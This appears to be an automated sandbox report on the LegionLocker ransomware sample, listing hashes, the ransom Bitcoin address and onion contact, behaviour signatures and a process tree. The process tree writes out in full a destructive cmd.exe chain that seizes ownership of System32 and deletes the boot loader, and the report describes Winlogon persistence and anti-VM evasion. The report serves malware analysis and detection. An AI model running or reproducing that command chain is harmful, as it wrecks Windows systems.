Analysis
-
max time kernel
151s -
max time network
119s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-07-2021 04:55
Static task
static1
Behavioral task
behavioral1
Sample
LegionLocker4.1.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
LegionLocker4.1.exe
Resource
win10v20210408
General
-
Target
LegionLocker4.1.exe
-
Size
3.2MB
-
MD5
563059c1ba238fb233200b053327313d
-
SHA1
c50908fe140fe127a6c2168ad7a07df6b9836186
-
SHA256
a4e002898d11ea511868a11a43dd29011dbe97bcbd9ee4b9fbcb0520d860f975
-
SHA512
9bbfe87044543ecf7fc6c865fad533ce864309c63cbff070c7f69ec1373392d149628c58bc7312bf72aae2aaecd6874c5ec95542042df6f34d65570da5d810bb
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
http://mail2tor2zyjdctd.onion/
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" LegionLocker4.1.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\FormatSplit.raw => C:\Users\Admin\Pictures\FormatSplit.raw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\SetFormat.png => C:\Users\Admin\Pictures\SetFormat.png.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe -
Possible privilege escalation attempt 5 IoCs
pid Process 3704 icacls.exe 2776 takeown.exe 1928 icacls.exe 2096 takeown.exe 1124 takeown.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LegionLocker4.1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LegionLocker4.1.exe -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 1124 takeown.exe 3704 icacls.exe 2776 takeown.exe 1928 icacls.exe 2096 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/3008-116-0x0000000000B80000-0x0000000000B81000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LegionLocker4.1.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp" LegionLocker4.1.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3008 LegionLocker4.1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings LegionLocker4.1.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2136 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe 3008 LegionLocker4.1.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3008 LegionLocker4.1.exe Token: SeDebugPrivilege 3008 LegionLocker4.1.exe Token: SeTakeOwnershipPrivilege 1124 takeown.exe Token: SeTakeOwnershipPrivilege 2776 takeown.exe Token: SeTakeOwnershipPrivilege 2096 takeown.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 3008 wrote to memory of 2296 3008 LegionLocker4.1.exe 75 PID 3008 wrote to memory of 2296 3008 LegionLocker4.1.exe 75 PID 3008 wrote to memory of 2296 3008 LegionLocker4.1.exe 75 PID 2296 wrote to memory of 1124 2296 cmd.exe 77 PID 2296 wrote to memory of 1124 2296 cmd.exe 77 PID 2296 wrote to memory of 1124 2296 cmd.exe 77 PID 2296 wrote to memory of 3704 2296 cmd.exe 78 PID 2296 wrote to memory of 3704 2296 cmd.exe 78 PID 2296 wrote to memory of 3704 2296 cmd.exe 78 PID 2296 wrote to memory of 2776 2296 cmd.exe 79 PID 2296 wrote to memory of 2776 2296 cmd.exe 79 PID 2296 wrote to memory of 2776 2296 cmd.exe 79 PID 2296 wrote to memory of 1928 2296 cmd.exe 80 PID 2296 wrote to memory of 1928 2296 cmd.exe 80 PID 2296 wrote to memory of 1928 2296 cmd.exe 80 PID 2296 wrote to memory of 2096 2296 cmd.exe 81 PID 2296 wrote to memory of 2096 2296 cmd.exe 81 PID 2296 wrote to memory of 2096 2296 cmd.exe 81 PID 3008 wrote to memory of 2204 3008 LegionLocker4.1.exe 86 PID 3008 wrote to memory of 2204 3008 LegionLocker4.1.exe 86 PID 3008 wrote to memory of 2204 3008 LegionLocker4.1.exe 86 PID 2204 wrote to memory of 2944 2204 cmd.exe 88 PID 2204 wrote to memory of 2944 2204 cmd.exe 88 PID 2204 wrote to memory of 2944 2204 cmd.exe 88 PID 3008 wrote to memory of 2136 3008 LegionLocker4.1.exe 89 PID 3008 wrote to memory of 2136 3008 LegionLocker4.1.exe 89 PID 3008 wrote to memory of 2136 3008 LegionLocker4.1.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"1⤵
- Modifies WinLogon for persistence
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\rundll32.exerundll32 user32.dll,UpdatePerUserSystemParameters3⤵PID:2944
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2136
-